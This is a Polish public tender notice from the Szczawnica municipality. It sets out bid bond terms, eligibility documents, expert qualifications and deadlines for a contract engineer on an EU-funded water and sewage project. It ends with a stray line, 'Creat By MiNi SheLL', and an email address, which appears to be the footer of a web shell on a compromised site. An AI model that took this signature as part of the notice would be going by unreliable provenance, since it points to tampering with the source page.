e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancjiporęczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
-odmówił podpisania umowy na warunkach określonych w ofercie, lub 
-nie wniósł zabezpieczenia należytego wykonania umowy, lub 
-zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
-nie złożył dokumentów lub oświadczeń na wezwanie zamawiającego, zgodnie z art. 46 ust. 4a Pzp
f) Gwarancjaporęczenia ma być nieodwołalne, bezwarunkowe, płatne na pisemne żądanie Zamawiającego i nieprzenośne na osoby trzecie. 

Miejsce i sposób wniesienia wadium:

1) Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego: 22 8817 0000 2001 0000 0589 0106 z dopiskiem: wadium dla przetargu: Inżynier Kontraktu- ujęcia
2) Wadium wnoszone w innych dopuszczonych przez Zamawiającego formach należy dołączyć w oryginale do oferty. 
3)Wykonawca zostanie wykluczony z niniejszego postępowania, jeżeli jego oferta przed upływem terminu składania ofert nie zostanie zabezpieczona akceptowaną przez Zamawiającego formą wadium w wymaganej wysokości. 
4) Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie do złożenia lub uzupełnienia oświadczeń, dokumentów lub pełnomocnictw nie złoży dokumentów lub oświadczeń potwierdzających spełnianie warunków udziału w postępowaniu lub pełnomocnictw chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) ogłoszeniu o zamówieniu oraz w Specyfikacji Istotnych Warunków Zamówienia (dalej SIWZ). 
1. Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:
1) posiadać uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące dokumenty: 
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich), 
b) dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Dokumenty te obejmują:
 - uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie, 
- aktualne zaświadczenie o przynależności do Okręgowej Izby Inżynierów Budownictwa. Powyższe dokumenty mogą być złożone w formie kserokopii potwierdzonej za zgodność z oryginałem przez Wykonawcę. 
Złożone uprawnienia muszą być zgodne z wymaganiami punktu Zdolność techniczna w niniejszym rozdziale SIWZ

2) nie podlegać wykluczeniu z postępowania na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r Nr 223, poz. 1655 z późn. zm). W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są złożyć oświadczenie (zawierające również oświadczenie dot. spełniania warunków zawartych w art. 22 ustawy pzp) według wzoru stanowiącego załącznik nr 1 do SIWZ, a także przedłożyć następujące dokumenty (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich): 
a) aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 u.p.z.p. wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
b) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
c) aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2. Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzaju dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy:
1)jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej w pkt VI.1.1)a) oraz VI.1.2)a)b)c) SIWZ, składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie; 
c) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
2) jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej w pkt VI.2.1)a)b)c), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
3) Dokumenty, o których mowa powyżej, potwierdzające spełnianie warunków udziału w postępowaniu, sporządzone w języku obcym są składane w formie oryginału, odpisu, wypisu, wyciągu lub kopii wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę. Wykonawca(cy) winni złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu. Dokument ten może być złożony przez każdego z Wykonawców składających ofertę wspólną(jedynie w sytuacji jeśli każdy z nich spełnia wszystkie warunki samodzielnie), albo może być złożony wspólnie, lecz w takim wypadku oświadczenie musi być złożone i podpisane przez pełnomocnika lub przez osoby reprezentujące wszystkich wykonawców.


Zdolność ekonomiczna i finansowa
Informacje i formalności konieczne do dokonania oceny spełniania wymogów.

Wykonawca winien znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku), tzn: 
a) posiadać w ostatnich 3 latach obrotowych prowadzonej działalności, a jeżeli okres prowadzenia jest krótszy, to w tym okresie, średnio roczne przychody netto ze sprzedaży w kwocie minimum 0,5 mln PLN( rok obrotowy - rozumie się przez to rok kalendarzowy lub inny okres trwający 12 kolejnych miesięcy kalendarzowych). 
W celu potwierdzenia spełnienia niniejszego warunku Wykonawca (każdy z Wykonawców składających ofertę wspólną) zobowiązany jest przedłożyć rachunek zysków i strat, a w przypadku Wykonawcy nie zobowiązanego do sporządzania sprawozdania finansowego, innych dokumentów określających przychody netto ze sprzedaży - za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, 

b) posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż wartość ceny ofertowej zamówienia bez podatku VAT. W celu potwierdzenia spełniania niniejszego warunku Wykonawca (każdy z Wykonawców składających ofertę wspólną) musi załączyć do oferty poświadczoną za zgodność z oryginałem kopię polisy lub inny dokument ubezpieczenia, potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 


Zdolność techniczna
Informacje i formalności konieczne do dokonania oceny spełniania wymogów:

Wykonawca powinien posiadać niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponować osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie): 
a) zatrudnia minimum 5 inżynierów poszczególnych branż - w tym 2 w sanitarnej, 1 w budowlanej, 1 w elektrycznej, 1 w drogowej. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć informację na temat liczby zatrudnionych inżynierów (rozumiemy przez to także §1 ust. 2 pkt 5 i 5a rozporządzenia w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane) w tym w branżach: sanitarnej, budowlanej i elektrycznej i drogowej sporządzoną według wzoru stanowiącego Załącznik nr 2 do SIWZ. 
b) wskazać do wykonania niniejszego zamówienia następujące osoby wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności: 
 Kierownik Zespołu: 
Pełniący jednocześnie funkcję specjalisty ds. robót wod.-kan., osoba musi posiadać następujące kwalifikacje: 
- posiadać wyższe wykształcenie techniczne,
- posiadać co najmniej 8 lat doświadczenia zawodowego, 
- posiadać doświadczenia w nadzorowaniu i zarządzaniu przynajmniej jednego kontraktu infrastrukturalnego z zakresu gospodarki wodno-ściekowej, zrealizowanego zgodnie z warunkami FIDIC, na stanowisku kierowniczym (jako: Kierownik projektu lub zespołu nadzorującego). Zakłada się, że Kierownik Zespołu dodatkowo będzie realizować zadania oraz spełniać wymagania postawione dla Kluczowego Eksperta 1 lub Kluczowego Eksperta 2 - na potrzeby uzupełnienia lub zastępstwa (wybór pozostawia się wykonawcy). 

  Kluczowy Ekspert nr 1:
Specjalista ds. wodno-technologicznych - Inspektor Nadzoru osoba musi posiadać następujące kwalifikacje:
- wyższe wykształcenie techniczne, 
- co najmniej 5 lat doświadczenia zawodowego, w tym co najmniej 3 lata doświadczenia jako inspektor nadzoru dla kontraktów infrastrukturalnych z zakresu gospodarki wodno-ściekowej 
- uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych i gazowych, wodociągowych, kanalizacyjnych bez ograniczeń zgodnie z ustawą z dnia 07 lipca 1994 Prawo Budowlane (tekst jedn. : Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zm.) w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
- wymagana przynależność do Okręgowej Izby Inżynierów Budownictwa. 

  Kluczowy Ekspert nr 2: 
Specjalista ds. wodno-sanitarnych - Inspektor Nadzoru, osoba musi posiadać następujące kwalifikacje: 
- wyższe wykształcenie techniczne, 
- co najmniej 5 lat doświadczenia zawodowego, w tym co najmniej 3 lata doświadczenia jako inspektor nadzoru dla projektów infrastrukturalnych z zakresu gospodarki wodno-ściekowej w tym budowy kanalizacji lub wodociągów o długości co najmniej 3 km w jednym zadaniu, 
- uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń
cieplnych, wentylacyjnych i gazowych, wodociągowych, kanalizacyjnych zgodnie z ustawą z dnia 07 lipca 1994 Prawo Budowlane (tekst jedn.: Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zm.) w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane w zakresie sieci, instalacji i urządzeń wodno-kanalizacyjnych, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
- wymagana przynależność do Okręgowej Izby Inżynierów Budownictwa, 


  Kluczowy Ekspert nr 3: 
Specjalista ds. elektrycznych i AKPiA - Inspektor Nadzoru pełniący jednocześnie funkcję specjalisty ds. rozliczeń robót elektrycznych i AKPiA, osoba musi posiadać następujące kwalifikacje: 
- wyższe wykształcenie techniczne, 
- co najmniej 5 lat doświadczenia zawodowego, 
- uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń zgodnie z ustawą z dnia 07 lipca 1994 Prawo Budowlane (tekst jedn.: Dz. U. z 2006r. Nr 156 poz. 1118 z późn. zm.) w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
- co najmniej 3 lata doświadczenia w wykonywaniu podobnych prac, przez prace podobne należy rozumieć prace w zakresie nadzoru wykonania sieci elektroenerget. oraz automatyki w budownictwie z zakresu gospodarki wodno-ściekowej, 
- wymagana przynależność do Okręgowej Izby Inżynierów Budownictwa. 

  Kluczowy Ekspert nr 4: 
Specjalista ds. konstrukcyjno-budowlanych - Inspektor Nadzoru Pełniący jednocześnie funkcję specjalisty ds. rozliczeń robót konstrukcyjno-budowlanych, osoba musi posiadać następujące kwalifikacje:, 
- wyższe wykształcenie techniczne, 
- co najmniej 5 lat doświadczenia zawodowego, 
- uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń zgodnie z ustawą z dnia 07 lipca 1994 Prawo Budowlane (tekst jedn.: Dz. U. z 2006 r. Nr 156 poz. 1118 z późn. zm.) w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
- co najmniej 3 lata doświadczenia w wykonywaniu podobnych prac; przez prace podobne należy rozumieć prace w zakresie nadzoru wykonania obiektów kubaturowych co najmniej 3000 m3, - wymagana przynależność do Okręgowej Izby Inżynierów Budownictwa. 

  Kluczowy Ekspert nr 5: 
Specjalista ds. drogowych - Inspektor Nadzoru Pełniący jednocześnie funkcję specjalisty ds. rozliczeń robót drogowych, osoba musi posiadać następujące kwalifikacje:, 
- wyższe wykształcenie techniczne, 
- co najmniej 5 lat doświadczenia zawodowego, 
- uprawnienia budowlane w specjalności drogowej bez ograniczeń zgodnie z ustawą z dnia 07 lipca 1994 Prawo Budowlane (tekst jedn.: Dz. U. z 2006 r. Nr 156 poz. 1118 z późn. zm.) w sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
- co najmniej 3 lata doświadczenia w wykonywaniu podobnych prac; przez prace podobne należy rozumieć prace w zakresie nadzoru wykonania obiektów drogowych o dł. co najmniej 3km, - wymagana przynależność do Okręgowej Izby Inżynierów Budownictwa. 

Z pośród ekspertów kluczowych Wykonawca wskaże w uzgodnieniu z Zamawiającym stałego rezydenta wraz z zapleczem pomocniczym na etapie przystąpienia do prac. 

W celu potwierdzenia spełnienia niniejszego warunku Wykonawca zobowiązany jest do przedłożenia: 
wykazu sporządzonego według wzoru stanowiącego załącznik nr 3 do SIWZ, (wzór wykazu) osób (Kluczowi eksperci), które będą wykonywać niniejsze zamówienie wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, do SIWZ wraz z informacją na temat kwalifikacji niezbędnych do wykonania zamówienia (życiorysów zawodowych) wszystkich ekspertów kluczowych; 
dla ekspertów kluczowych zaświadczeń o przynależności do Izby Samorządu Zawodowego, kserokopii wymaganych uprawnień zawodowych. 
Zaświadczenia i uprawnienia mogą być złożone w formie kserokopii potwierdzonych za zgodność z oryginałem przez Wykonawcę. Inżynier powinien dostarczyć swoim ekspertom niezbędne wsparcie i pomoc techniczną ze strony innych specjalistów, która może być niezbędna do właściwego wdrożenia Kontraktu na Roboty ( np. dodatkowi inspektorzy nadzoru w wymaganych branżach na potrzeby realizowanych etapów i prac, projektanci, kosztorysant, uprawniony geodeta, radca prawny, hydrogeolog, specjalista ds. telekomunikacji, ekspert ppoż., inżynier materiałowy, specjalista ds. ochrony placu budowy, administratorzy, informatycy, sekretarki, kierowcy, itp.). Ponadto Inżynier dla wypełnienia warunków Zadania musi zapewnić odpowiednie usługi tłumacza w celu efektywnej realizacji kontraktu (w przypadku podmiotu zagranicznego). 
Wymagane jest, aby Wykonawca w ciągu ostatnich trzech lat przed dniem publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności był krótszy, to w tym okresie: 
  Pełnił funkcję Inżyniera zgodnie z warunkami kontraktowymi FIDIC, przynajmniej dla jednej inwestycji z zakresu ochrony środowiska, o wartości robót minimum 3 mln PLN bez podatku VAT, 
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych usług, sporządzony według wzoru stanowiącego załącznik nr 4 do SIWZ oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie (referencje).

Zamawiający dokona oceny spełniania warunków na podstawie załączonych do oferty oświadczeń i dokumentów, przy zastosowaniu formuły: spełnianie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> jw..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szczawnica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Szczawnica
ul. Szalaya 103
34-460 Szczawnica
pok. nr 14.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2009 godzina 11:00, miejsce: Urząd Miasta i Gminy Szczawnica
ul. Szalaya 103
34-460 Szczawnica
sekretariat, pok. nr 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie finansowane z następujących źródeł: 
- współfinansowane przez Unię Europejską w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013, Oś Priorytetowa 7 Infrastruktura Ochrony Środowiska, Działanie 7.1 Gospodarka wodno - ściekowa - 48,59%

Creat By MiNi SheLL
Email: jattceo@gmail.com